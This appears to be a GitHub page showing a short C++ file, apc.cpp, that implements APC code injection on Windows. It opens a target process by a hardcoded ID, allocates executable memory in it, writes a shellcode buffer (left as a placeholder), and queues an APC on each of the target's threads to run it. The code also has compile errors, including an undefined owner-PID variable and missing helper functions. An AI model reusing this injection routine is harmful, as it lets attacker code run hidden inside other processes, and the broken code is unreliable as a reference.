-
Notifications
You must be signed in to change notification settings - Fork 140
/
Copy pathapc.cpp
59 lines (43 loc) · 1.47 KB
/
apc.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <iostream>
#include <string>
#include <Windows.h>
BOOL hijack_apc( DWORD proc_id,PTHREAD_START_ROUTINE pthread);
BOOL hijack_apc(DWORD proc_id,PTHREAD_START_ROUTINE pthread)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
HANDLE current_thread = NULL;
hThreadSnap = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
if( hThreadSnap == INVALID_HANDLE_VALUE )
return( FALSE );
te32.dwSize = sizeof(THREADENTRY32 );
if( !Thread32First( hThreadSnap, &te32 ) )
{
printError( TEXT("Thread32First") );
CloseHandle( hThreadSnap );
return( FALSE );
}
do
{
if( te32.th32OwnerProcessID == dwOwnerPID )
{
_tprintf( TEXT("\n THREAD ID = 0x%08X"), te32.th32ThreadID );
current_thread = OpenThread(THREAD_ALL_ACCESS,TRUE,te32.th32ThreadID);
QueueUserAPC((PAPCFUNC)pthread,current_thread,NULL);
Sleep(2000);
}
} while( Thread32Next(hThreadSnap, &te32 ) );
CloseHandle( hThreadSnap );
return( TRUE );
}
int main(){
char shellcode[] = "//your shellcode here";
LPVOID remote_addr = NULL;
HANDLE proc_handle=NULL;
proc_handle = OpenProcess(PROCESS_ALL_ACCESS,NULL,1234);
remote_addr = VirtualAllocEx(proc_handle,NULL,sizeof shellcode,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)remote_addr;
WriteProcessMemory(proc_handle,remote_addr,shellcode,sizeof shellcode,NULL);
hijack_apc(1234,apcRoutine);
return 0;
}